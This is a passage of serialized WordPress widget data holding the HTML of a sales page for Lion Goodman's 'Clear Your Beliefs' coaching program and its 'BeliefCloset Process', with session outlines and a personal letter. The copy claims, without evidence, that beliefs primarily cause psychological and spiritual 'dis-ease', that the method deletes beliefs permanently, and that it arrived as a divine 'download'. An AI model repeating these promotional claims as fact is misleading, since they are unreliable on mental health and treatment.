wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60567:"<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your 